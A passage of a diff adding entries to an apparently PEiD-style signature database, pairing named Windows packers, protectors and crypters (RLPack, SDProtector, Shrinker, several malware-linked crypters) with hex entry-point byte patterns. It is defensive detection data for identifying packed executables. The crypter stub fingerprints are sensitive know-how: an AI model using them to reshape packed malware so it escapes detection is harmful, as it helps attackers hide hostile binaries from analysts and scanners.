+signature = 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 10
+ep_only = false
+
+[RLPack V1.0.beta -> ap0x]
+signature = 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB
+ep_only = true
+
+[RLPack V1.11 -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 4A 02 00 00 8D 9D 11 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB
+ep_only = true
+
+[RLPack V1.12-V1.14 (aPlib 0.43) -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF EB 0F FF ?? ?? ?? FF ?? ?? ?? D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB
+ep_only = false
+
+[RLPack V1.12-V1.14 (LZMA 4.30) -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 60
+ep_only = false
+
+[RLPack V1.15-V1.17 (aPlib 0.43) -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 45 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB
+ep_only = true
+
+[RLPack V1.15-V1.17 (LZMA 4.30) -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 83 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB 14
+ep_only = true
+
+[RLPack V1.15-V1.17 Dll -> ap0x]
+signature = 80 7C 24 08 01 0F 85 ?? 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8
+ep_only = true
+
+[RLPack v1.18 Basic DLL [aPLib] -> Ap0x]
+signature = 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83
+ep_only = true
+
+[RLPack v1.18 Basic DLL [LZMA] -> Ap0x]
+signature = 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A
+ep_only = true
+
+[RLPack v1.18 Basic [aPLib] -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83
+ep_only = true
+
+[RLPack v1.18 Basic [LZMA] -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A
+ep_only = true
+
+[RLPack V1.19 (aPlib 0.43) -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 3C 04 00 00 EB 0C 8B 85 38 04 00 00 89 85 3C 04 00 00 8D B5 60 04 00 00 8D 9D EB 02 00 00 33 FF E8 52 01 00 00 EB 1B 8B 85 3C 04 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 48 04 00 00 00 74 0E 83 BD 4C 04 00 00 00 74 05 E8 B8 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 D1 03 00 00 89 85 5C 04 00 00 5B FF B5 5C 04 00 00 56 FF D3 83 C4 08 8B B5 5C 04 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 E9 94 00 00 00 56 FF 95 C9 03 00 00 85 C0 0F 84 B4 00 00 00 89 85 54 04 00 00 8B C6 EB 5B 8B 85 58 04 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 58 04 00 00 C7 00 20 20 20 00 EB 06 FF B5 58 04 00 00 FF B5 54 04 00 00 FF 95 CD 03 00 00 85 C0 74 71 89 07 83 C7 04 8B 85 58 04 00 00 EB 01 40 80 38 00 75 FA 40 89 85 58 04 00 00 66 81 78 02 00 80 74 A5 80 38 00 75 A0 EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 80 3E 01 0F 85 63 FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 5C 04 00 00 FF 95 D5 03 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3
+ep_only = true
+
+[RLPack V1.19 (LZMA 4.30) -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 49 0B 00 00 EB 0C 8B 85 45 0B 00 00 89 85 49 0B 00 00 8D B5 6D 0B 00 00 8D 9D 2F 03 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 DA 0A 00 00 89 85 41 0B 00 00 E8 76 01 00 00 EB 20 60 8B 85 49 0B 00 00 FF B5 41 0B 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 C7 08 83 3C 37 00 75 DA 83 BD 55 0B 00 00 00 74 0E 83 BD 59 0B 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 DA 0A 00 00 89 85 69 0B 00 00 5B 60 FF B5 41 0B 00 00 56 FF B5 69 0B 00 00 FF D3 61 8B B5 69 0B 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 E9 98 00 00 00 56 FF 95 D2 0A 00 00 89 85 61 0B 00 00 85 C0 0F 84 C8 00 00 00 8B C6 EB 5F 8B 85 65 0B 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 65 0B 00 00 C7 00 20 20 20 00 EB 06 FF B5 65 0B 00 00 FF B5 61 0B 00 00 FF 95 D6 0A 00 00 85 C0 0F 84 87 00 00 00 89 07 83 C7 04 8B 85 65 0B 00 00 EB 01 40 80 38 00 75 FA 40 89 85 65 0B 00 00 66 81 78 02 00 80 74 A1 80 38 00 75 9C EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 80 3E 01 0F 85 5F FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 69 0B 00 00 FF 95 DE 0A 00 00 68 00 40 00 00 68 00 20 0C 00 FF B5 41 0B 00 00 FF 95 DE 0A 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3
+ep_only = true
+
+[RLPack V1.19 Dll (aPlib 0.43) -> ap0x]
+signature = 80 7C 24 08 01 0F 85 89 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 3C 04 00 00 EB 0C 8B 85 38 04 00 00 89 85 3C 04 00 00 8D B5 60 04 00 00 8D 9D EB 02 00 00 33 FF E8 52 01 00 00 EB 1B 8B 85 3C 04 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 48 04 00 00 00 74 0E 83 BD 4C 04 00 00 00 74 05 E8 B8 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 D1 03 00 00 89 85 5C 04 00 00 5B FF B5 5C 04 00 00 56 FF D3 83 C4 08 8B B5 5C 04 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 E9 94 00 00 00 56 FF 95 C9 03 00 00 85 C0 0F 84 B4 00 00 00 89 85 54 04 00 00 8B C6 EB 5B 8B 85 58 04 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 58 04 00 00 C7 00 20 20 20 00 EB 06 FF B5 58 04 00 00 FF B5 54 04 00 00 FF 95 CD 03 00 00 85 C0 74 71 89 07 83 C7 04 8B 85 58 04 00 00 EB 01 40 80 38 00 75 FA 40 89 85 58 04 00 00 66 81 78 02 00 80 74 A5 80 38 00 75 A0 EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 80 3E 01 0F 85 63 FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 5C 04 00 00 FF 95 D5 03 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3
+ep_only = true
+
+[RLPack V1.19 Dll (LZMA 4.30) -> ap0x]
+signature = 80 7C 24 08 01 0F 85 C7 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 49 0B 00 00 EB 0C 8B 85 45 0B 00 00 89 85 49 0B 00 00 8D B5 6D 0B 00 00 8D 9D 2F 03 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 DA 0A 00 00 89 85 41 0B 00 00 E8 76 01 00 00 EB 20 60 8B 85 49 0B 00 00 FF B5 41 0B 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 C7 08 83 3C 37 00 75 DA 83 BD 55 0B 00 00 00 74 0E 83 BD 59 0B 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 DA 0A 00 00 89 85 69 0B 00 00 5B 60 FF B5 41 0B 00 00 56 FF B5 69 0B 00 00 FF D3 61 8B B5 69 0B 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 E9 98 00 00 00 56 FF 95 D2 0A 00 00 89 85 61 0B 00 00 85 C0 0F 84 C8 00 00 00 8B C6 EB 5F 8B 85 65 0B 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 65 0B 00 00 C7 00 20 20 20 00 EB 06 FF B5 65 0B 00 00 FF B5 61 0B 00 00 FF 95 D6 0A 00 00 85 C0 0F 84 87 00 00 00 89 07 83 C7 04 8B 85 65 0B 00 00 EB 01 40 80 38 00 75 FA 40 89 85 65 0B 00 00 66 81 78 02 00 80 74 A1 80 38 00 75 9C EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 80 3E 01 0F 85 5F FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 69 0B 00 00 FF 95 DE 0A 00 00 68 00 40 00 00 68 00 20 0C 00 FF B5 41 0B 00 00 FF 95 DE 0A 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3
+ep_only = true
+
+[ROD High TECH -> Ayman]
+signature = 60 8B 15 1D 13 40 00 F7 E0 8D 82 83 19 00 00 E8 58 0C 00 00
+ep_only = true
+
+[RosAsm 2050a -> Betov]
+signature = 55 8B EC 60 8B 5D 08 B9 08 00 00 00 BF ?? ?? ?? ?? 83 C7 07 FD 8A C3 24 0F 04 30 3C 39 76 02 04 07 AA C1 EB 04 E2 EE FC 68 00 10 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 15 ?? ?? ?? ?? 61 8B E5 5D C2 04 00
+ep_only = false
+
+[Rpoly crypt by Vaska (20.03.07 18:41)]
+signature = 58 ?? ?? ?? ?? ?? ?? ?? E8 00 00 00 58 E8 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? 04
+ep_only = false
+
+[RPolyCrypt v 1.0 (personal polycryptor) sign from pinch]
+signature = 50 58 97 97 60 61 8B 04 24 80 78 F3 6A E8 00 00 00 00 58 E8 00 00 00 00 58 91 91 EB 00 0F 85 6B F4 76 6F E8 00 00 00 00 83 C4 04 E8 00 00 00 00 58 90 E8 00 00 00 00 83 C4 04 8B 04 24 80 78 F1
+ep_only = true
+
+[Safe 2.0]
+signature = 83 EC 10 53 56 57 E8 C4 01 00
+ep_only = false
+
+[SafeDisc v4]
+signature = 00 00 00 00 00 00 00 00 00 00 00 00 42 6F 47 5F
+ep_only = false
+
+[SafeGuard V1.0X -> simonzh2000]
+signature = E8 00 00 00 00 EB 29 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 59 9C 81 C1 E2 FF FF FF EB 01 ?? 9D FF E1
+ep_only = true
+
+[SC Obfuscator -> SuperCRacker]
+signature = 60 33 C9 8B 1D 00 ?? ?? ?? 03 1D 08 ?? ?? ?? 8A 04 19 84 C0 74 09 3C ?? 74 05 34 ?? 88 04 19 41 3B 0D 04 ?? ?? ?? 75 E7 A1 08 ?? ?? ?? 01 05 0C ?? ?? ?? 61 FF 25 0C
+ep_only = false
+
+[Sc Obfuscator -> SuperCRacker]
+signature = 60 33 C9 8B 1D ?? ?? ?? ?? 03 1D ?? ?? ?? ?? 8A 04 19 84 C0 74 09 3C ?? 74 05 34 ?? 88 04 19 41 3B 0D ?? ?? ?? ?? 75 E7 A1 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 61 FF 25 ?? ?? ?? ?? 00 00
+ep_only = true
+
+[SDC 1.2 (Self Decrypting Binary Generator) - by Claes M Nyberg]
+signature = 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 A0 91 40 00 E8 DB FE FF FF 55 89 E5 53 83 EC 14 8B 45 08 8B 00 8B 00 3D 91 00 00 C0 77 3B 3D 8D 00 00 C0 72 4B BB 01 00 00 00 C7 44 24 04 00 00 00 00 C7 04 24 08 00 00 00 E8 CE 24 00 00 83 F8 01 0F 84 C4 00 00 00 85 C0 0F 85 A9 00 00 00 31 C0 83 C4 14 5B 5D C2 04 00 3D 94 00 00 C0 74 56 3D 96 00 00 C0 74 1E 3D 93 00 00 C0 75 E1 EB B5 3D 05 00 00 C0 8D B4 26 00 00 00 00 74 43 3D 1D 00 00 C0 75 CA C7 44 24 04 00 00 00 00 C7 04 24 04 00 00 00 E8 73 24 00 00 83 F8 01 0F 84 99 00 00 00 85 C0 74 A9 C7 04 24 04 00 00 00 FF D0 B8 FF FF FF FF EB 9B 31 DB 8D 74 26 00 E9 69 FF FF FF C7 44 24 04 00 00 00 00 C7 04 24 0B 00 00 00 E8 37 24 00 00 83 F8 01 74 7F 85 C0 0F 84 6D FF FF FF C7 04 24 0B 00 00 00 8D 76 00 FF D0 B8 FF FF FF FF E9 59 FF FF FF C7 04 24 08 00 00 00 FF D0 B8 FF FF FF FF E9 46 FF FF FF C7 44 24 04 01 00 00 00 C7 04 24 08 00 00 00 E8 ED 23 00 00 B8 FF FF FF FF 85 DB 0F 84 25 FF FF FF E8 DB 15 00 00 B8 FF FF FF FF E9 16 FF FF FF C7 44 24 04 01 00 00 00 C7 04 24 04 00 00 00 E8 BD 23 00 00 B8 FF FF FF FF E9 F8 FE FF FF C7 44 24 04 01 00 00 00 C7 04 24 0B 00 00 00 E8 9F 23 00 00 B8 FF FF FF FF E9 DA FE FF FF
+ep_only = true
+
+[SDProtect -> Randy Li]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05
+ep_only = true
+
+[SDProtector 1.x -> Randy Li]
+signature = 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41
+ep_only = true
+
+[SDProtector Basic/Pro Edition 1.10 -> Randy Li]
+signature = 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 50 83 EC 08 64 A1 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 83 C4 08 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 64
+ep_only = true
+
+[SDProtector Basic/Pro Edition 1.12 -> Randy Li]
+signature = 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 7B 03 00 00 03 C8 74 C4 75 C2 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E2
+ep_only = true
+
+[SDProtector Pro Edition 1.16 -> Randy Li]
+signature = 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 18 33 C0 89 41 04 89 41
+ep_only = true
+
+[SDProtector Pro Edition 1.16 -> Randy Li]
+signature = 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 18 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 93 03 00 00 03 C8 74 C4 75 C2 E8
+ep_only = true
+
+[SDProtector V1.1x -> Randy Li]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 88 88 88 08 64 A1
+ep_only = true
+
+[SEA-AXE]
+signature = FC BC ?? ?? 0E 1F E8 ?? ?? 26 A1 ?? ?? 8B 1E ?? ?? 2B C3 8E C0 B1 ?? D3 E3
+ep_only = true
+
+[SEA-AXE v2.2]
+signature = FC BC ?? ?? 0E 1F A3 ?? ?? E8 ?? ?? A1 ?? ?? 8B ?? ?? ?? 2B C3 8E C0 B1 03 D3 E3 8B CB BF ?? ?? 8B F7 F3 A5
+ep_only = true
+
+[SecuPack v1.5]
+signature = 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 CC 3A 40 ?? E8 E0 FC FF FF 33 C0 55 68 EA 3C 40 ?? 64 FF 30 64 89 20 6A ?? 68 80 ?? ?? ?? 6A 03 6A ?? 6A 01 ?? ?? ?? 80
+ep_only = true
+
+[SecureEXE 3.0 -> ZipWorx]
+signature = E9 B8 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00
+ep_only = true
+
+[SecurePE 1.X -> www.deepzone.org]
+signature = 8B 04 24 E8 00 00 00 00 5D 81 ED 4C 2F 40 00 89 85 61 2F 40 00 8D 9D 65 2F 40 00 53 C3 00 00 00 00 8D B5 BA 2F 40 00 8B FE BB 65 2F 40 00 B9 C6 01 00 00 AD 2B C3 C1 C0 03 33 C3 AB 43 81 FB 8E 2F 40 00 75 05 BB 65 2F 40 00 E2 E7 89 AD 1A 31 40 00 89 AD 55 34 40 00 89 AD 68 34 40 00 8D 85 BA 2F 40 00 50 C3
+ep_only = true
+
+[Securom7 -> Sony DADC]
+signature = B8 ?? ?? ?? ?? 8B ?? ?? ?? ?? 0A ?? ?? ?? ?? ?? ?? E8
+ep_only = true
+
+[SEN Debug Protector???]
+signature = BB ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 29 ?? ?? 4E E8
+ep_only = true
+
+[Sentinel SuperPro (Automatic Protection) v6.4.0 -> Safenet]
+signature = 68 ?? ?? ?? ?? 6A 01 6A 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C9 3D B7 00 00 00 A1 ?? ?? ?? ?? 0F 94 C1 85 C0 89 0D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 55 56 C7 05 ?? ?? ?? ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 15
+ep_only = true
+
+[Sentinel SuperPro (Automatic Protection) v6.4.1 -> Safenet]
+signature = A1 ?? ?? ?? ?? 55 8B ?? ?? ?? 85 C0 74 ?? 85 ED 75 ?? A1 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 55 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 15 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 6A 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 01 00 00 00 5D C2 0C 00
+ep_only = true
+
+[Setup Factory v6.0.0.3 Setup Launcher]
+signature = 55 8B EC 6A FF 68 90 61 40 00 68 70 3B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 14 61 40 00 33 D2 8A D4 89 15 5C 89 40 00 8B C8 81 E1 FF 00 00 00 89 0D 58 89 40 00 C1 E1 08 03 CA 89 0D 54 89 40 00 C1 E8 10 A3 50 89
+ep_only = false
+
+[Setup2Go Installer Stub]
+signature = 5B 53 45 54 55 50 5F 49 4E 46 4F 5D 0D 0A 56 65 72
+ep_only = false
+
+[Sexe Crypter 1.1 - by santasdad]
+signature = 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 D8 39 00 10 E8 30 FA FF FF 33 C0 55 68 D4 3A 00 10 64 FF 30 64 89 ?? ?? ?? ?? E4 3A 00 10 A1 00 57 00 10 50 E8 CC FA FF FF 8B D8 53 A1 00 57 00 10 50 E8 FE FA FF FF 8B F8 53 A1 00 57 00 10 50 E8 C8 FA FF FF 8B D8 53 E8 C8 FA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 14 57 00 10 E8 AD F6 FF FF B8 14 57 00 10 E8 9B F6 FF FF 8B CF 8B D6 E8 DA FA FF FF 53 E8 84 FA FF FF 8D 4D EC BA F8 3A 00 10 A1 14 57 00 10 E8 0A FB FF FF 8B 55 EC B8 14 57 00 10 E8 65 F5 FF FF B8 14 57 00 10 E8 63 F6 FF FF E8 52 FC FF FF 33 C0 5A 59 59 64 89 10 68 DB 3A 00 10 8D 45 EC E8 ED F4 FF FF C3 E9 83 EF FF FF EB F0 5F 5E 5B E8 ED F3 FF FF 00 53 45 54 54 49 4E 47 53 00 00 00 00 FF FF FF FF 12 00 00 00 6B 75 74 68 37 36 67 62 62 67 36 37 34 76 38 38 67 79
+ep_only = true
+
+[Shegerd Dongle V4.78 -> MS.Co.]
+signature = E8 32 00 00 00 B8 ?? ?? ?? ?? 8B 18 C1 CB 05 89 DA 36 8B 4C 24 0C
+ep_only = true
+
+[ShellModify 0.1 -> pll621]
+signature = 55 8B EC 6A FF 68 98 66 41 00 68 3C 3D 41 00 64 A1 00 00 00 00
+ep_only = true
+
+[Shrink v1.0]
+signature = 50 9C FC BE ?? ?? BF ?? ?? 57 B9 ?? ?? F3 A4 8B ?? ?? ?? BE ?? ?? BF ?? ?? F3 A4 C3
+ep_only = true
+
+[Shrink v2.0]
+signature = E9 ?? ?? 50 9C FC BE ?? ?? 8B FE 8C C8 05 ?? ?? 8E C0 06 57 B9
+ep_only = true
+
+[Shrink Wrap v1.4]
+signature = 58 60 8B E8 55 33 F6 68 48 01 ?? ?? E8 49 01 ?? ?? EB
+ep_only = true
+
+[Shrinker 3.2]
+signature = 55 8B EC 56 57 75 65 68 00 01 00 00 E8 F1 E6 FF FF 83 C4 04
+ep_only = false
+
+[Shrinker 3.3]
+signature = 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8
+ep_only = false
+
+[Shrinker 3.4]
+signature = 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 11 0B 00 00 83 C4 04
+ep_only = false
+
+[Shrinker v3.2]
+signature = 83 3D ?? ?? ?? ?? ?? 55 8B EC 56 57 75 65 68 00 01 ?? ?? E8 ?? E6 FF FF 83 C4 04 8B 75 08 A3 ?? ?? ?? ?? 85 F6 74 1D 68 FF
+ep_only = true
+
+[Shrinker v3.3]
+signature = 83 3D ?? ?? ?? 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8
+ep_only = true
+
+[Shrinker v3.4]
+signature = 83 3D B4 ?? ?? ?? ?? 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 ?? 0B 00 00 83 C4 04 8B 75 08 A3 B4 ?? ?? ?? 85 F6 74 23 83 7D 0C 03 77 1D 68 FF
+ep_only = true
+
+[Shrinker v3.4]
+signature = BB ?? ?? BA ?? ?? 81 C3 07 00 B8 40 B4 B1 04 D3 E8 03 C3 8C D9 49 8E C1 26 03 0E 03 00 2B
+ep_only = true
+
+[Silicon Realms Install Stub]
+signature = 55 8B EC 6A FF 68 ?? 92 40 00 68 ?? ?? 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 ?? ?? 40 00 33 D2 8A D4 89 15 ?? ?? 40 00 8B C8 81 E1 FF 00 00 00 89 0D ?? ?? 40 00 C1 E1 08 03 CA 89 0D ?? ?? 40 00 C1 E8 10 A3
+ep_only = false
+
+[SimbiOZ -> Extranger]
+signature = 50 60 E8 00 00 00 00 5D 81 ED 07 10 40 00 68 80 0B 00 00 8D 85 1F 10 40 00 50 E8 84 0B 00 00
+ep_only = true
+
+[SimbiOZ 1.3 -> Extranger]
